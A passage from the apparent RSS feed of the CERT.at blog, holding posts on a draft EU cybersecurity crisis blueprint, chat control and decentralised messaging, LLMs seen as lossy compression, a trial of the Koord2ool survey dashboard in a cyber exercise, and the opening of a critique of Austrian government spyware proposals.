&lt;p class=&quot;block&quot;&gt;Other dependencies worth looking at are the Internet&amp;rsquo;s routing infrastructure, including the mechanism for securing BGP, the authoritative side of the DNS, content delivery networks (CDNs &amp;ndash; where some services claim to serve significant portions of the global content), large e-mail operators and the hyper-scaler IaaS/PaaS/SaaS cloud services. The singular focus on DNS resolution is not warranted. We shouldn't just talk about the dependency where we have an EU alternative in place.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Triggers for large-scale incidents&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The text is not really explicit about this, but it reads like it implicitly assumes that malicious technical cyber operations will be the cause for large-scale incidents. In other words, some sort of illegal access to computing resources in the EU (or a denial-of-service attack) with either hacktivist, criminal or political motivations. I think this is far too narrow.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;One of the basic ways of looking at cyber security is the C-I-A triad: Confidentiality, Integrity and Availability. And the latter is not only threatened by &amp;ldquo;malicious hackers&amp;rdquo;, but mainly (if one looks at NIS 1 mandatory reporting) by bugs, mistakes of operators, flooding, backhoes + anchors, failing disks, power outages, and dozens of other reasons for IT Oopsies. The incident from July 2024 where a &lt;a href=&quot;https://en.wikipedia.org/wiki/2024_CrowdStrike-related_IT_outages&quot;&gt;CrowdStrike EDR update crashed 8.5 million systems worldwide&lt;/a&gt;, is a good example. As a thought experiment: assume that a similar error results in a more sustained downtime or even data loss: would the blueprint be applicable?&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Another possible trigger for a large-scale incident could be supply chain issues. Here EU documents usually only think in terms of the &lt;a href=&quot;https://en.wikipedia.org/wiki/SolarWinds#2019%E2%80%932020_supply_chain_attacks&quot;&gt;SolarWinds incident of 2019/20&lt;/a&gt; or the trustworthiness of certain categories of vendors (see the 5G toolbox). In focus are network intrusions caused by security problems by managed service providers, by business partners, by vendors, or outsourcing partners. We sometimes forget about the most basic of supply chain issues: not being supplied any more.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Supply chain disruptions in the software business used to be long-term issues: maybe the supplier cancels the product, and you must transition to another one, or there might be issues with updates and security fixes. In the age of online license checks and Software-as-a-Service delivered via the cloud, any disruptions on the side of the vendor can have immediate effects on all his customers. That all assumes that the vendor is acting freely, but this assumption might be wrong: in the case of geopolitical tensions, other &lt;a href=&quot;https://www.reading.ac.uk/news/2025/Expert-Comment/US-sanctions-International-Criminal-Court&quot;&gt;forces might trump the will and the interests of a vendor&lt;/a&gt;. There might be sanctions, there might be secondary sanctions, there might be sudden export restrictions, and, in the case of hardware supply, there might be disruptions in the production.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Not all of these cases will be something where the CSIRTs (or commercial incident response companies) can ride in to save the day, some of these cases will be highly political and will require a solution on that layer. Better yet, these cases need to be considered long before the crisis hits. Sometimes I think that &amp;ldquo;rely completely on US cloud providers&amp;rdquo; is the 2025 version of &amp;ldquo;buy natural gas exclusively from Russia&amp;rdquo;.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;High-risk vendors&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In recital (18), &amp;ldquo;high-risk suppliers&amp;rdquo; is only used in the context of &amp;ldquo;vulnerabilities have to be disclosed for state use&amp;rdquo;. This is one-dimensional thinking. Suppliers can be high-risk because they are a monopoly and can thus raise prices without market considerations. Others may become a pawn in geopolitical power-plays.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Secure Communication&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;As recital (23) states, communication can be a key component in handling a crisis. But we don&amp;rsquo;t need yet another bespoke solution for the EU entities and their national partners, we need something where we can also add the private sector to the communication, as they are the ones who run most of our digital infrastructure. Insofar, recital (24) is correct: we need to think not in individual silos. Instead, the crisis communication and response need to bridge between them.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The idea from point (30) to use Matrix as a technological base is a good one. One word of caution, though: we cannot continue to use Open-Source software and only think of deployment costs, we also need to reserve funding for the development and maintenance of the product itself. For example, when switching from the commercial version of Mattermost to Matrix, one should redirect a considerable fraction of the no longer needed license fees to support the Open-Source project.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Situational Awareness&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;II(6) is a bit too much focussed on technical part of the situational awareness. A complete threat assessment also needs to factor in the motivation, capabilities and intentions of possible adversaries. This is something I hear often from the private sector: they are mostly satisfied with the technical CTI available to them, but they lack the strategic intelligence on potentially adversary actors ranging from hacktivists, organized crime up to state actors. Point (23) is well taken, but what about the commission&amp;rsquo;s own cyber situation centre? What value can that provide to the aggregated situational awareness of all actors?&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Taxonomy&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;To be honest, there are already too many proposals for incident taxonomies out there. Doing yet another iteration is &lt;a href=&quot;https://xkcd.com/927/&quot;&gt;unlikely to improve the situation&lt;/a&gt;. Where a common taxonomy is really missing in practice is a unified severity scale.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Responding to a cyber crisis&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Point (25) is the core of the document.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;(a) is fine, it correctly defines the role of the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I have issues with (b): it should be the sole responsibility of EU-CyCLONe to provide information about the impact of an incident to the political layer. Its members are the national cyber crisis coordinators, they should have the national impact assessments and can aggregate those within their network. The CSIRTs are focussing on the technical, purely cyber parts of the incident. The aggregation of this technical information in the CSIRTs Network talks about intrusion vectors, vulnerabilities, indicators of compromise, affected IT systems, mitigation measures, and expected time to restore. This is the information that the CSIRTs Network will share with EU-CyCLONe.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Crisis Management&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The text is a bit thin on the actual crisis management processes used across all actors. For example: I assume that the national CSIRTs will operate under the direction of their respective national crisis centres. Their main reporting requirements will be there and decisions by the national crisis manager will have precedence to any request coming in from the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Or: how much will EU-CyCLONe act as the crisis coordinator for the CSIRTs Network? My assumption here is &amp;ldquo;not at all&amp;rdquo;, instead I expect that requests from EU-CyCLONe will first go to the national cyber crisis coordinator who will, if sensible, instruct the national CSIRT accordingly.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In other words, crisis management needs clear responsibilities and chains of command; a simple &amp;ldquo;everybody should cooperate&amp;rdquo; is not enough. This blueprint should be clearer on the questions whether those chains of command are on the national side or on the EU side.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;EU Cybersecurity Reserve&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;There is no need to describe the SLA of the reserve in this text, point 26(a) should be removed.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;A statement on the information flow triggered by the deployment of the reserve would improve the document.&lt;/p&gt;</description><pubDate>Tue, 04 Mar 2025 16:56:34 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2025/3/a-revision-of-the-eu-cybersecurity-blueprint</guid><dc:creator>CERT.at</dc:creator><dc:date>2025-03-04T16:56:34Z</dc:date></item><item><title>Chat Control vs. File Sharing</title><link>https://www.cert.at/en/blog/2025/2/chat-control-vs-file-sharing</link><description>&lt;p class=&quot;block&quot;&gt;The spectre of &amp;ldquo;law-enforcement going dark&amp;ldquo; is on the EU agenda once again. I&amp;rsquo;ve written about the unintended consequences of states using malware to break into mobile phones to monitor communication multiple times. See &lt;a href=&quot;https://www.cert.at/de/blog/2017/8/blog-20170731130131-2076&quot;&gt;here&lt;/a&gt; and &lt;a href=&quot;https://www.cert.at/de/blog/2024/9/ein-paar-gedanken-zur-uberwachung-verschlusselter-nachrichten&quot;&gt;here&lt;/a&gt;. Recently it became known that yet another democratic EU Member state has &lt;a href=&quot;https://www.theguardian.com/technology/2025/feb/06/owner-of-spyware-used-in-alleged-whatsapp-breach-ends-contract-with-italy&quot;&gt;employed such software to spy on journalists and other civil society figures&lt;/a&gt; &amp;ndash; and not on the hardened criminals or terrorists which are always cited as the reason why these methods are needed.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Anyway, I want to discuss a different aspect today: the intention of various law enforcement agencies to enact legislation to force the operators of &amp;ldquo;over-the-top&amp;rdquo; (OTT) communication services (WhatsApp, Signal, iChat, Skype, &amp;hellip;) to implement a backdoor to the end-to-end encryption feature that all modern applications have introduced over the last years. When I talked to a Belgian public prosecutor last year about that topic he said: &amp;ldquo;we don&amp;rsquo;t want a backdoor for the encryption, &lt;a href=&quot;https://edri.org/our-work/dutch-decision-puts-brakes-on-chat-control/&quot;&gt;we want the collaboration of the operators to give us access&lt;/a&gt; when we ask for it&amp;rdquo;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Let&amp;rsquo;s assume the law enforcement folks win the debate in the EU and chat control becomes law. How might this play out?&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;My view on this is shaped by two thoughts:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;strong&gt;1) Product versus service.&lt;/strong&gt; Right now, the instant messaging platforms operate primarily as services: they run computers and software that enable the communication. They handle the authentication, the directory and the OTT equivalent of the mobile operator&amp;rsquo;s &lt;a href=&quot;https://en.wikipedia.org/wiki/Network_switching_subsystem#Home_location_register_.28HLR.29&quot;&gt;Home Location Register (HLR)&lt;/a&gt;: the system that enables communication endpoints to find each other. Implementing all this in a server-client model certainly make sense, but it&amp;rsquo;s not the only way it can be done. The seminal text on this is &lt;a href=&quot;https://web.archive.org/web/20040411105557/http://shirky.com/writings/zapmail.html&quot;&gt;Clay Shirky&amp;rsquo;s essay on ZapMail&lt;/a&gt;, FedEx&amp;rsquo; attempt to build a service based on FAX machines which completely bombed because people just bought their own FAX machines, turning a prospective service into a product that operates on top of the phone network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;strong&gt;2) The evolution of file-sharing applications.&lt;/strong&gt; Initially, &lt;a href=&quot;https://en.wikipedia.org/wiki/Napster&quot;&gt;Napster&lt;/a&gt; was built as service: the central Napster servers knew about the files each member of the network offered and could then act as a broker that matched file searches to clients who offered those files. On an abstract level, this is exactly what WhatApp is doing, just instead of enabling a download it is enabling texting and calls. This made Napster the obvious target for legal action: the content-owners knew exactly whom to sue. And it worked: by targeting this central broker service, the lawsuits managed to shut down this file-sharing model.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;But it didn&amp;rsquo;t stop file-sharing, it just changed the model how it operated. The centralized service evolved into a &lt;a href=&quot;https://en.wikipedia.org/wiki/Peer-to-peer&quot;&gt;peer-to-peer model&lt;/a&gt;. Users downloaded software that built a P2P overlay network over the Internet which provided the necessary directory / search / rendezvous functions without the need for a central node. While the technology used (&lt;a href=&quot;https://en.wikipedia.org/wiki/Distributed_hash_table&quot;&gt;distributed hash tables&lt;/a&gt;) was pretty new, this is actually how most of the initial Internet applications work: you download (or buy) software that implements a certain protocol, configure the DNS as the directory / rendezvous function and pronto: you are part of the global network. It still works this way for e-mail and the world wide web. The spam epidemic is one of the downsides of this fully distributed approach.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;strong&gt;What does this mean for instant messaging apps?&lt;/strong&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;If the legislation targets the OTT services themselves, one possible counter is to de-centralize the service. Make it as thin as possible, e.g. by providing only an authentication and directory service, but refrain completely from being involved in any communication between users. The latter can be implemented with a P2P setup. This has been done before: the original Skype protocol also was heavily reliant on users acting as communication hubs.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Alternatively, the communication service could split into multiple small, interconnected services. Models for this are the fediverse (the network of Mastodon instances which together implement a global social media platform), Jabber (based on the XMPP protocol) or federated Matrix instances. These all make use of the DNS to enable instance to instance communication.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;If user identifiers are domain-based, that&amp;rsquo;s easy to do, for phone-number based networks this is a bit trickier &amp;ndash; regrettably &lt;a href=&quot;https://en.wikipedia.org/wiki/Telephone_number_mapping&quot;&gt;ENUM&lt;/a&gt; didn&amp;rsquo;t take off, that would have been the perfect directory to map phone numbers to instant messaging IDs. But maybe we finally see a killer application for the blockchain: mapping identifiers to cryptographic keys in a distributed fashion is something that might actually work using that technology.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;So yes, it is possible that any serious government interference with OTT services might trigger the development of alternative technologies and a shift of the users to the new architecture. If the user experience is good, this could happen pretty quickly. Yes, there is &lt;a href=&quot;https://en.wikipedia.org/wiki/Metcalfe%27s_law&quot;&gt;Metcalfe&amp;rsquo;s law&lt;/a&gt; to overcome, but there are historical precedents of populations switching from one social network to another. It may be slow in the beginning, but once a tipping point is reached, it might become unstoppable.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Here the analogy with file-sharing breaks down: sending copyrighted files to strangers is of questionable legality, texting with friends or calling a relative over the Internet is certainly legal.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;What are the next steps? If people download one of the available chat-and-call applications, maybe choosing between simple open-source implementations and fancy commercial ones, then what can law enforcement do? Make distributing those programs illegal? Make using them illegal? I cannot believe that this will work from a legal point of view.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;strong&gt;Summary&lt;/strong&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Any heavy-handed interference by lawmakers into the end-to-end encryption properties of OTT service could trigger an evolutionary step in those applications with wide-reaching implications. I strongly recommend treading very lightly here: it is probably a lot better to enter a constructive discussion with the OTT service on cooperative policing of their users. After all, it is not in the operator&amp;rsquo;s interest to expose their users to fraudsters on their service. Every additional story of government abuse of surveillance makes this a harder sell.&lt;/p&gt;</description><pubDate>Fri, 14 Feb 2025 15:45:55 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2025/2/chat-control-vs-file-sharing</guid><dc:creator>CERT.at</dc:creator><dc:date>2025-02-14T15:45:55Z</dc:date></item><item><title>LLMs as Lossy Compression of Information</title><link>https://www.cert.at/en/blog/2025/1/llms-as-lossy-compression-of-information</link><description>&lt;p class=&quot;block&quot;&gt;Back when I was studying computer science, one of the interesting bits was the discussion of the information content in a message which is distinct to the actual number of bits used to transmit the same message. I can remember a &lt;a href=&quot;https://en.wikipedia.org/wiki/Information_content&quot;&gt;definition &lt;/a&gt;which involved the sum of logarithms of long-term occurrences versus the transmitted messages. The upshot was, that only if 0s and 1s are equally distributed, then each Bit contains one bit worth of information.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The next iteration was compressibility: if there are patterns in the message, then a compression algorithm can reduce the number of bits needed to store the full message, thus the information content in original text does not equal its number of bits. This could be a simple Huffman encoding, or more advanced algorithms like Lempel-Ziv-Welch, but one of the main points here is that the algorithm is completely content agnostic. There are no databases of English words inside these compressors; they cannot substitute numerical IDs of word for the words themselves. That would be considered cheating in the generic compression game. (There are, of course, some instances of very domain-specific compression algorithms which do build on knowledge of the data likely to be transmitted. HTTP/2 or SIP header-compression are such examples.)&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Another interesting progress was the introduction of lossy compression. For certain applications (e.g., images, sounds, videos) it is not necessary to be able to reproduce the original file bit by bit, but only to generate something that looks or sounds very similar to the original media. This unlocked a huge potential for efficient compression. JPEG for images, MPEG3 for music and DIVX for movies reached the broad population by shrinking these files to manageable sizes. They made digital mixtapes (i.e., self-burned audio CDs) possible, CD-ROMs with pirated movies were traded in school yards and Napster started the online file-sharing revolution.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Now we have the LLMs, the large language models which are an implementation of generative AI: Algorithms, combined with a large memory derived by processing huge amounts of content, can now transform texts, images, sounds and even videos into each other. They can act as compressors: you can feed text into an LLM and ask for a summary, but you can also ask it to expand an argument from a few bullet points into a short essay. The inner state of the LLM while it performs these actions kind of represents the essence of the content it is processing. The output format is independent of this state: in the simplest case, you can specify whether the output should be in German or in English, additionally, you can ask for different styles: write for children, write dry legal prose, be witty or even write the content as a poem. Translating from one medium to another is also possible: the AI can look at a picture and generate a textual description of the image, or vice-versa, it can create a picture out of a written content summary.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I&amp;rsquo;m pretty sure the following scenario has already happened: An employee is asked to write a report on a certain subject: he thinks about the topic, comes up with a few ideas which he writes down as a list of bullet points. These are handed to an LLM with an appropriate prompt to generate a nice 5-page report detailing these points. The AI obliges and the resulting 5-pager is handed to the boss. Being short on time, he doesn&amp;rsquo;t want to read five pages, so he asks an LLM to summarize the paper to give him the core message in list of short statements. Ideally, the second LLM reproduces the same bullet point which the employee originally came up with, making the whole exercise a complete waste of computation resources.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;There are two points in this story which are important to note:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;First, if we are liberal with the concept of &amp;ldquo;lossy compression&amp;rdquo;, then the specific formulation of an idea in a language doesn&amp;rsquo;t really matter in terms of information content. If you give an LLM the same prompt time and time again, you will get different results each time. If, for example, you ask for a Limerick about a horse in a bar, you will get different ones almost every time. But on a more abstract level, they are all embodiments of the same concept: a Limerick about a horse in a bar. The same applies to a switch in languages: if you ask the LLM to change the output from German to English, the result will change substantially. But again: if you just look at the abstract ideas embodied in the text, the language it is written in just does not matter.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The bible in Greek, English, or German might have very few words in common, but the content is the same. This is just like converting a picture from GIF to JPEG: The bits in the file have completely changed but given the right parsers they produce the same information content, with only some fuzziness in details caused by the jpeg compression.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Secondly, when processing a prompt or analysing a text/image/sound, the LLM produces an activation pattern in its high-dimensional set of parameters that form the scaffolding of its memory, transforming the input into something that one might call its &amp;ldquo;state of mind&amp;rdquo;. This is the LLM-internal representation of the input, abstracting away the unimportant bits of incoming information and retaining the meaning. This internal state is opaque to us, we have little information which parameter corresponds to exactly what concept. I also don&amp;rsquo;t know the size in Bytes that this representation needs.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Now comes the &amp;ldquo;generative&amp;rdquo; part of the AI: the combination of the state, the learned connections between the concept and the prompt enable the LLM to transform this opaque state of mind into an output that humans can understand. The output can be short, e.g., if the prompt asks for a short, written summary, or longer, if the target format is an essay. Coming back the example from above: the LLM does not iteratively compress a longer text into a summary by analysing individual sentences, instead it speedreads everything into something like short-term memory and then dumps out the highlights it found.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;If a short prompt can produce the same activation pattern as a long input text, then the information content is the same. This only works because the LLM has this huge storage of knowledge it can reference &amp;ndash; something we said in the beginning that classic compression algorithms cannot utilize. So, as an example, the input &amp;ldquo;lyrics of the Beatles&amp;rsquo; song Yesterday&amp;rdquo; and the actual lyrics as two dozen lines of text convey the same information to the LLM. This enables truly enormous compression rates.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;To summarize, it might be a helpful abstraction to view LLMs as lossy compression/de-compression machines that can utilize an enormous pool of knowledge to make the process much more efficient, as long as you accept the fact that this a very lossy compression which only preserves the core concepts contained in the input but is free to change the representation of this information content. And, of course, it is prone to make wrong associations and hallucinate content.&lt;/p&gt;</description><pubDate>Wed, 22 Jan 2025 09:52:49 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2025/1/llms-as-lossy-compression-of-information</guid><dc:creator>CERT.at</dc:creator><dc:date>2025-01-22T09:52:49Z</dc:date></item><item><title>Testing the Koord2ool</title><link>https://www.cert.at/en/blog/2024/11/testing-the-koord2ool</link><description>&lt;p class=&quot;block&quot;&gt;As part of the EU-funded project &amp;ldquo;AWAKE&amp;rdquo;, we built the Koord2ool, which is a tool that allowed us to track the state of an incident across our constituency over time.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/files/en_cef-300x42.png&quot; alt=&quot;&quot; width=&quot;300&quot; height=&quot;42&quot; /&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;We implemented this application as an extension to LimeSurvey (an Open Source survey tool) which generates a dashboard to visualize the state of the answers over time.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;For this to work, the survey needs to have the following properties:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;We must identify participants in order to track their responses over the time. In LimeSurvey parlance, this is called &amp;ldquo;Closed Mode&amp;rdquo;: There is a database of participants, which also contains a unique token for each e-mail address. This token is sent in the invitation mail sent to each participant and is used for access control and user tracking.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;A participant must be able to repeatedly fill out the survey. This is controlled by the &amp;ldquo;Allow multiple responses or update responses with one access code:&amp;rdquo; setting.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;I recommend to also set &amp;ldquo;Enable participant-based response persistence&amp;ldquo; to &amp;bdquo;On&amp;ldquo;. This helps with the consistency of the answers.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The code is here: &lt;a href=&quot;https://github.com/ait-cs-IaaS/koord2ool&quot;&gt;https://github.com/ait-cs-IaaS/koord2ool &lt;/a&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Last week, we participated in a national cyber exercise that was organised by the KS&amp;Ouml; with AIT as the technology partner. This year, I focussed on getting the Koord2ool up and running and see how the concept performs during the exercise.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blogpost documents my experience.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I used the &amp;ldquo;introduction day&amp;rdquo; to test the installation of the Koord2ool inside AIT&amp;rsquo;s cyber range. It took us a bit of time to correctly configure the email settings &amp;ndash; LimeSurvey needs to be able to send out the invitations, and to prepare a basic survey with all the right settings and test the procedure of adding new questions to an existing survey &amp;ndash; see below for details.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;At the start of the exercise, I had a basic survey ready with two parts:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;A &amp;ldquo;Meta&amp;rdquo; group to ask questions about the exercise itself: are you having fun? Do the tools work? Etc.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;A &amp;ldquo;Status&amp;rdquo; group where I started with a basic &amp;ldquo;What is the status of your fictional company?&amp;rdquo; question.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;As the game progressed, I added more and more questions and sent our reminder emails to the players to keep filling out our survey.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Results:&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The Koord2ool use wasn&amp;rsquo;t officially announced by the exercise moderator, and the invitations were sent only to the official &amp;ldquo;office@&amp;rdquo; email-address of the virtual companies. Maybe some players thought that this was a phishing inject, it took us some time to get answers from every company. Over the time, this looked like this:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20241111-koord2ool/2024-11-11-koord2ool-comments.png&quot; alt=&quot;&quot; width=&quot;605&quot; height=&quot;368&quot; /&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The y-axis are the participants, the x-axis is the time. The dots are answers. So, from the 6 virtual companies, we got both one, two and three answers from two each. Regrettably, this was not enough to really track the state of the game over the full exercise.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This resulted in the following graph describing the status of the companies:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20241111-koord2ool/2024-11-11-koord2ool-status.png&quot; alt=&quot;&quot; width=&quot;605&quot; height=&quot;342&quot; /&gt;&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Lessons Learned&lt;/h2&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;We really need to make answering the survey an official part of the exercise with regular announcements by the organizers to fill out the survey at predefined intervals.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;I&amp;rsquo;m not 100% sure that we really managed to squash all bugs regarding the data processing. (but maybe it&amp;rsquo;s just the CERT.at installation which I use right now to look at the exported/imported survey data)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;The process of adding questions is a bit cumbersome, it needs the following steps:&#13;
&lt;ul&gt;&#13;
&lt;li&gt;Stop / Deactive the survey&lt;/li&gt;&#13;
&lt;li&gt;Edit the structure of the survey &amp;ndash; add new questions&lt;/li&gt;&#13;
&lt;li&gt;Activate survey, choose &amp;ldquo;closed mode&amp;rdquo; and select &amp;ldquo;restore participants&amp;rdquo;&lt;/li&gt;&#13;
&lt;li&gt;In the responses tab, use &amp;ldquo;import&amp;rdquo; to restore previously archived answers&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;LimeSurvey tries to be clever by not allowing invitations / reminders to be sent to participants who already have received an invitaion or have submitted in a response respectively. This makes a lot of sense for &amp;ldquo;normal&amp;rdquo; surveys, but not for our use-case where we need multiple answers from participants. The way to work around this feature is to use the &amp;ldquo;Bulk Edit&amp;rdquo; functionality in the participant management to reset the &amp;ldquo;Invitation sent&amp;rdquo; and &amp;ldquo;response received&amp;rdquo; columns for all respondents.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Let's see how Koord2ool will work in future exercises and real world incidents.&lt;/p&gt;</description><pubDate>Mon, 11 Nov 2024 15:51:52 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2024/11/testing-the-koord2ool</guid><dc:creator>CERT.at</dc:creator><dc:date>2024-11-11T15:51:52Z</dc:date></item><item><title>Another round: Government malware &amp; digital surveillance</title><link>https://www.cert.at/en/blog/2024/8/another-round-government-malware-digital-surveillance</link><description>&lt;p class=&quot;block&quot;&gt;Not just the seasons, or my attempts to appear in the office in an outfit other than holey conference shirts, shorts and Birkenstock slippers that are cyclical. The desire of politicians for a &quot;government trojan&quot; or surveillance of digital communication seemingly follows a constant rhythm as well - and apparently it's that time again. Federal Chancellor Karl Nehammer is making the surveillance of digital communication a fixed condition for a future political coalition.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;A government-sanctioned malware has resurfaced on the political table again as well. What the government thinks about such a digital trojan horse could clearly be seen in a legislative draft circulating in the media. Allegedly, this draft was supposed to be in accordance with the restrictions placed on digital surveillance by the Constitutional Court back in 2019. Although the draft was, fortunately, rejected, I would still like to discuss some parts of it. Mainly because I assume that we will be having this very same conversation again in a few months' time.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Specifically, the draft talks about the monitoring of messages that are &quot;sent, transmitted or received in encrypted form&quot; by &quot;introducing a program into a computer system of the person concerned&quot;. I find the given need to &quot;technically ensure that only messages sent or received within a specified, pre-authorized time period are monitored&quot; particularly interesting.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;According to legal experts, this would enable constitutionally compliant surveillance because the surveillance software available on the market is already &quot;much more focused on chat messages&quot; and no longer &quot;applicable to the entire cell phone&quot;. Whatever that means.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Personally, I would wish that not just&amp;nbsp; lawyers were consulted on this topic, but that security experts and technicians were also allowed to contribute their part. Letting legal experts make technical judgments is like letting me make legal assessments - not exactly optimal&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;As a technician, I must clearly disagree with the lawyers here. The current solutions from various providers of commercial spyware (which would probably be used, I do not assume that the responsible authorities in Austria would develop their own solutions) are all not designed to monitor only certain applications. As far as I know, there is no spyware that monitors (for example) only Telegram or only Viber.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Of course, it would be possible for the provider to configure its system in such a way that only messages from (for example) Telegram or Viber are displayed to customers. However, this is an organizational safeguard, not a technical guarantee that only relevant messages are monitored. The same applies to the requirement that only messages within a monitoring period specified in an order may be targeted.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Compromising an end user device with commercial spyware always means that the privacy of the person concerned is completely compromised. Keyword compromised: I assume that &quot;introducing a program into a computer system of the person concerned&quot; does not mean that the persons concerned go to their local police station, hand in their cell phone or computer (including the necessary credentials to access them) and go for a coffee around the corner while the officers &quot;introduce&quot; the &quot;program&quot;. At least I hope that's not what is meant.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;No, what is being talked about here is that security vulnerabilities are exploited to install malware on the devices. For security gaps to be exploited, the vulnerabilities must remain unpatched. At the same time, however, this also means that a system remains insecure in the broadest sense. And other actors with (depending on how you look at it, &quot;even&quot;) more malicious intentions can also abuse the vulnerabilities in question.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This fact, especially in view of the upcoming implementation of NIS-2, that the state is putting itself in a dilemma here:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
